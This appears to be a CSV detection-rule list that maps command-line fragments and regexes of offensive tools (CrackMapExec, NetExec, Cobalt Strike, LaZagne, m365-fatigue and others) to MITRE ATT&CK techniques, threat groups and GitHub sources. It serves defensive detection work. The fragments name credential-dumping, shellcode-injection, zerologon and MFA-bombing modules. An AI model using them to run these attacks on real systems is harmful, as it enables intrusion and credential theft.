"* -M scuffy*",".{0,1000}\s\-M\sscuffy.{0,1000}","offensive_tool_keyword","crackmapexec","crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct Lateral Movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002 - T1047","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater - ENERGETIC BEAR - EMBER BEAR - BERSERK BEAR - Black Basta","Credential Access","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","10","8690","1667","2023-12-06T17:09:42Z","2015-08-14T14:11:55Z","2089"
"* -M shadowcoerce *",".{0,1000}\s\-M\sshadowcoerce\s.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Black Basta","Discovery","https://github.com/lefayjey/linWinPwn","1","0","#linux","N/A","10","10","1953","283","2025-04-15T14:51:50Z","2021-12-16T22:13:10Z","2090"
"* -M shadowcoerce*",".{0,1000}\s\-M\sshadowcoerce.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","N/A","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","2091"
"* -M shellcode_inject*",".{0,1000}\s\-M\sshellcode_inject.{0,1000}","offensive_tool_keyword","crackmapexec","crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct Lateral Movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002 - T1047","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater - ENERGETIC BEAR - EMBER BEAR - BERSERK BEAR - Black Basta","Credential Access","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","10","8690","1667","2023-12-06T17:09:42Z","2015-08-14T14:11:55Z","2092"
"* -M slinky",".{0,1000}\s\-M\sslinky","offensive_tool_keyword","crackmapexec","crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct Lateral Movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002 - T1047","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater - ENERGETIC BEAR - EMBER BEAR - BERSERK BEAR - Black Basta","Credential Access","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","10","8690","1667","2023-12-06T17:09:42Z","2015-08-14T14:11:55Z","2094"
"* -M slinky -o SERVER=*",".{0,1000}\s\-M\sslinky\s\-o\sSERVER\=.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","N/A","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","2095"
"* -M spider_plus *",".{0,1000}\s\-M\sspider_plus\s.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Black Basta","Discovery","https://github.com/lefayjey/linWinPwn","1","0","#linux","N/A","10","10","1953","283","2025-04-15T14:51:50Z","2021-12-16T22:13:10Z","2096"
"* -M spider_plus -o MAX_FILE_SIZE=100*",".{0,1000}\s\-M\sspider_plus\s\-o\sMAX_FILE_SIZE\=100.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","N/A","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","2097"
"* -M teams_localdb *",".{0,1000}\s\-M\steams_localdb\s.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Black Basta","Discovery","https://github.com/lefayjey/linWinPwn","1","0","#linux","N/A","10","10","1953","283","2025-04-15T14:51:50Z","2021-12-16T22:13:10Z","2099"
"* -M tokens*",".{0,1000}\s\-M\stokens.{0,1000}","offensive_tool_keyword","crackmapexec","crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct Lateral Movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002 - T1047","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater - ENERGETIC BEAR - EMBER BEAR - BERSERK BEAR - Black Basta","Credential Access","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","10","8690","1667","2023-12-06T17:09:42Z","2015-08-14T14:11:55Z","2100"
"* -M uac",".{0,1000}\s\-M\suac","offensive_tool_keyword","crackmapexec","crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct Lateral Movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002 - T1047","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater - ENERGETIC BEAR - EMBER BEAR - BERSERK BEAR - Black Basta","Credential Access","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","10","8690","1667","2023-12-06T17:09:42Z","2015-08-14T14:11:55Z","2101"
"* -m venv csexec *",".{0,1000}\s\-m\svenv\scsexec\s.{0,1000}","offensive_tool_keyword","CSExec","An alternative to *exec.py from impacket with some builtin tricks","T1059.001 - T1059.005 - T1071.001","TA0002","N/A","N/A","Lateral Movement","https://github.com/Metro-Holografix/CSExec.py","1","0","N/A","private github repo","10","","N/A","","","","2102"
"* -M wdigest -o ACTION=disable*",".{0,1000}\s\-M\swdigest\s\-o\sACTION\=disable.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","N/A","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","2103"
"* -M wdigest -o ACTION=enable*",".{0,1000}\s\-M\swdigest\s\-o\sACTION\=enable.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","N/A","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","2104"
"* -M web_delivery*",".{0,1000}\s\-M\sweb_delivery.{0,1000}","offensive_tool_keyword","crackmapexec","crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct Lateral Movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002 - T1047","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater - ENERGETIC BEAR - EMBER BEAR - BERSERK BEAR - Black Basta","Credential Access","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","10","8690","1667","2023-12-06T17:09:42Z","2015-08-14T14:11:55Z","2105"
"* -M zerologon *",".{0,1000}\s\-M\szerologon\s.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Black Basta","Discovery","https://github.com/lefayjey/linWinPwn","1","0","#linux","N/A","10","10","1953","283","2025-04-15T14:51:50Z","2021-12-16T22:13:10Z","2106"
"* m365-fatigue.py *",".{0,1000}\sm365\-fatigue\.py\s.{0,1000}","offensive_tool_keyword","m365-fatigue","automates the authentication process for Microsoft 365 by using the device code flow and Selenium for automated login. It keeps bombing the user with MFA requests and stores the access_token once the MFA was approved.","T1110.001 - T1078.001 - T1556.004","TA0006 - TA0008 - TA0009","N/A","N/A","Credential Access","https://github.com/0xB455/m365-fatigue","1","0","N/A","N/A","10","1","77","7","2024-04-08T14:53:44Z","2023-11-30T13:33:03Z","2107"
"* m3-gen.py *",".{0,1000}\sm3\-gen\.py\s.{0,1000}","offensive_tool_keyword","MaliciousMacroMSBuild","Generates Malicious Macro and Execute Powershell or Shellcode via MSBuild Application Whitelisting Bypass.","T1059.001 - T1059.003 - T1127 - T1027.002","TA0002 - TA0004","N/A","N/A","Defense Evasion","https://github.com/infosecn1nja/MaliciousMacroMSBuild","1","0","N/A","N/A","8","6","507","123","2019-08-06T08:16:05Z","2018-04-09T23:16:30Z","2108"
"* macro_pack.py*",".{0,1000}\smacro_pack\.py.{0,1000}","offensive_tool_keyword","macro_pack","The macro_pack is a tool used to automatize obfuscation and generation of retro formats such as MS Office documents or VBS like format. Now it also handles various shortcuts formats.","T1587 - T1588 - T1027 - T1204 ","TA0005 - TA0002 - TA0008 - TA0011 - TA0042","N/A","Black Basta","Resource Development","https://github.com/sevagas/macro_pack","1","0","N/A","N/A","10","10","2241","412","2024-08-15T14:21:39Z","2017-10-03T18:30:06Z","2110"
"* main.c  log.c shelljack.c *",".{0,1000}\smain\.c\s\slog\.c\sshelljack\.c\s.{0,1000}","offensive_tool_keyword","Mara","Mara is a userland pty/tty sniffer","T1055 - T1106 - T1059","TA0002 - TA0005 - TA0003","N/A","N/A","Sniffing & Spoofing","https://github.com/io-tl/Mara/","1","0","N/A","N/A","9","1","53","6","2023-12-22T16:52:47Z","2022-08-02T13:02:41Z","2111"
"* MakeMeEnterpriseAdmin.ps1",".{0,1000}\sMakeMeEnterpriseAdmin\.ps1","offensive_tool_keyword","KrbRelayUp","a universal no-fix local privilege escalation in windows domain environments where LDAP signing is not enforced (the default settings).","T1558 - T1210","TA0004 - TA0003","N/A","Dispossessor - Back Basta","Privilege Escalation","https://github.com/Dec0ne/KrbRelayUp","1","0","N/A","N/A","10","10","1580","209","2022-08-06T12:23:58Z","2022-04-24T21:33:00Z","2112"
"* --maketoken --username * --password * --domain *",".{0,1000}\s\-\-maketoken\s\-\-username\s.{0,1000}\s\-\-password\s.{0,1000}\s\-\-domain\s.{0,1000}","offensive_tool_keyword","TokenPlayer","Manipulating and Abusing Windows Access Tokens","T1134 - T1484 - T1055 - T1078","TA0004 - TA0005 - TA0006","N/A","N/A","Privilege Escalation","https://github.com/S1ckB0y1337/TokenPlayer","1","0","N/A","N/A","10","3","274","45","2021-01-15T16:07:47Z","2020-08-20T23:05:49Z","2113"
"* --malicious-package *",".{0,1000}\s\-\-malicious\-package\s.{0,1000}","offensive_tool_keyword","panix","PANIX is a highly customizable Linux persistence tool","T1068 - T1543.003 - T1546.004 - T1169 - T1059 - T1136.001 - T1546.001 - T1078.003 - T1564.001 - T1053 - T1003.008 - T1543.002 - T1053.002 - T1546.012","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Aegrah/PANIX","1","0","#linux","N/A","8","7","622","68","2025-03-05T10:45:04Z","2024-05-19T12:37:40Z","2114"
"* malleable.profile*",".{0,1000}\smalleable\.profile.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike C2 Reverse proxy that fends off Blue Teams. AVs. EDRs. scanners through packet inspection and malleable profile correlation","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/mgeeky/RedWarden","1","0","N/A","N/A","10","10","964","143","2022-10-07T14:05:25Z","2021-05-15T22:05:39Z","2115"
"* malleable-c2-randomizer*",".{0,1000}\smalleable\-c2\-randomizer.{0,1000}","offensive_tool_keyword","cobaltstrike","A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/bluscreenofjeff/Malleable-C2-Randomizer","1","0","N/A","N/A","10","10","444","87","2022-09-09T15:50:16Z","2017-05-31T15:44:43Z","2116"
"* --mangle-strip-go *",".{0,1000}\s\-\-mangle\-strip\-go\s.{0,1000}","offensive_tool_keyword","ProtectMyTooling","Multi-Packer wrapper letting us daisy-chain various packers obfuscators and other Red Team oriented weaponry","T1027 - T1202","TA0005","N/A","N/A","Resource Development","https://github.com/mgeeky/ProtectMyTooling","1","0","N/A","packer bundled","7","10","947","136","2024-12-06T20:10:02Z","2021-09-28T09:47:45Z","2117"
"* mask?a?a?a?a?*",".{0,1000}\smask\?a\?a\?a\?a\?.{0,1000}","offensive_tool_keyword","JohnTheRipper","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","Black Basta","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","N/A","10","11216","2220","2025-04-22T11:24:06Z","2011-12-16T19:43:47Z","2118"
"* --mask=?1?1?1* --min-len*",".{0,1000}\s\-\-mask\=\?1\?1\?1.{0,1000}\s\-\-min\-len.{0,1000}","offensive_tool_keyword","JohnTheRipper","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","Black Basta","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","N/A","10","11216","2220","2025-04-22T11:24:06Z","2011-12-16T19:43:47Z","2119"
"* --max-attack-time*",".{0,1000}\s\-\-max\-attack\-time.{0,1000}","offensive_tool_keyword","wapiti","Web vulnerability scanner written in Python3","T1592 - T1592.003","TA0007 - TA0040","N/A","N/A","Vulnerability Scanner","https://github.com/wapiti-scanner/wapiti","1","0","N/A","N/A","N/A","10","1372","212","2025-04-16T11:41:00Z","2020-06-06T20:17:55Z","2120"
"* maxdb-info.nse*",".{0,1000}\smaxdb\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","2121"
"* -mc all -fc 404 -sf -noninteractive -of json*",".{0,1000}\s\-mc\sall\s\-fc\s404\s\-sf\s\-noninteractive\s\-of\sjson.{0,1000}","offensive_tool_keyword","reconftw","reconFTW is a tool designed to perform automated recon on a target domain by running the best set of tools to perform scanning and finding out vulnerabilities","T1595 - T1590 - T1592 - T1596 - T1598 - T1046 - T1599 - T1213 - T1597","TA0043 - TA0042 - TA0007 - TA0001","N/A","N/A","Vulnerability Scanner","https://github.com/six2dez/reconftw","1","0","#linux","N/A","7","10","6202","982","2025-04-22T13:01:31Z","2020-12-30T23:52:52Z","2122"
"* mcafee-epo-agent.nse*",".{0,1000}\smcafee\-epo\-agent\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","2123"
"* -mdns y -mdnsunicast n*",".{0,1000}\s\-mdns\sy\s\-mdnsunicast\sn.{0,1000}","offensive_tool_keyword","Inveigh",".NET IPv4/IPv6 machine-in-the-middle tool for penetration testers","T1550.002 - T1059.001 - T1071.001","TA0002","N/A","ALLANITE - ENERGETIC BEAR","Sniffing & Spoofing","https://github.com/Kevin-Robertson/Inveigh","1","0","N/A","N/A","10","10","2685","462","2024-08-06T01:47:27Z","2015-04-02T18:04:41Z","2124"
"* -mDNSTTL *",".{0,1000}\s\-mDNSTTL\s.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER","Framework","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","2125"
"* membase-brute.nse*",".{0,1000}\smembase\-brute\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","2130"
"* membase-http-info.nse*",".{0,1000}\smembase\-http\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","2131"
"* memcached-info.nse*",".{0,1000}\smemcached\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","2132"
"* memexec.pl*",".{0,1000}\smemexec\.pl.{0,1000}","offensive_tool_keyword","Orc","Orc is a post-exploitation framework for Linux written in Bash","T1059.004 - T1036.005 - T1070.002 - T1012 - T1082 - T1003 - T1555.003 - T1049 - T1134.001 - T1202","TA0005 - TA0003 - TA0002 - TA0006 - TA0011","N/A","N/A","Exploitation tool","https://github.com/zMarch/Orc","1","0","#linux","N/A","9","4","395","53","2019-11-12T18:21:27Z","2018-08-16T11:31:39Z","2133"
"* memexec.py*",".{0,1000}\smemexec\.py.{0,1000}","offensive_tool_keyword","Orc","Orc is a post-exploitation framework for Linux written in Bash","T1059.004 - T1036.005 - T1070.002 - T1012 - T1082 - T1003 - T1555.003 - T1049 - T1134.001 - T1202","TA0005 - TA0003 - TA0002 - TA0006 - TA0011","N/A","N/A","Exploitation tool","https://github.com/zMarch/Orc","1","0","#linux","N/A","9","4","395","53","2019-11-12T18:21:27Z","2018-08-16T11:31:39Z","2134"
"* memorpy *",".{0,1000}\smemorpy\s.{0,1000}","offensive_tool_keyword","pupy","PupyRAT is a  C2 and post-exploitation framework written in python and C","T1548.002 - T1134.001 - T1087.001 - T1557.001 - T1071.001 - T1560.001 - T1123 - T1547.001 - T1547.013 - T1059.001 - T1059.006 - T1136.001 - T1136.002 - T1543.002 - T1555 - T1555.003 - T1114.001 - T1573.002 - T1041 - T1083 - T1070.001 - T1105 - T1056.001 - T1046 - T1135 - T1003.001 - T1003.004 - T1003.005 - T1057 - T1055.001 - T1021.001 - T1113 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1552.001 - T1550.003 - T1125 - T1497.001","TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta - Magic Hound - APT33 - Cutting Kitten","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","N/A","10","10","8671","1822","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z","2135"
"* memorydump.py*",".{0,1000}\smemorydump\.py.{0,1000}","offensive_tool_keyword","LaZagne","The LaZagne project is an open source application used to retrieve lots of passwords stored on a local computer. Each software stores its passwords using different techniques (plaintext   APIs   custom algorithms   databases   etc.). This tool has been developed for the purpose of finding these passwords for the most commonly-used software.","T1555 - T1555.001 - T1555.003 - T1555.004 - T1003.001 - T1003.004 - T1003.005 - T1003.007 - T1003.008 - T1552.001","TA0006 - TA0009","N/A","Akira - AvosLocker - LockBit - GoGoogle - 8BASE - RansomEXX - Leafminer - Wizard Spider - APT3 - Scattered Spider - OilRig - MuddyWater - Inception - APT33 - TeamTNT - Tonto Team - Evilnum - CHRYSENE - GOLD DUPONT","Credential Access","https://github.com/AlessandroZ/LaZagne","1","0","N/A","N/A","10","10","9941","2062","2025-04-10T14:24:35Z","2015-02-16T14:10:02Z","2136"
"* memreader.c *",".{0,1000}\smemreader\.c\s.{0,1000}","offensive_tool_keyword","cobaltstrike","MemReader Beacon Object File will allow you to search and extract specific strings from a target process memory and return what is found to the beacon output","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/trainr3kt/MemReader_BoF","1","0","N/A","N/A","10","10","46","6","2023-12-05T23:25:22Z","2021-04-21T20:51:25Z","2137"
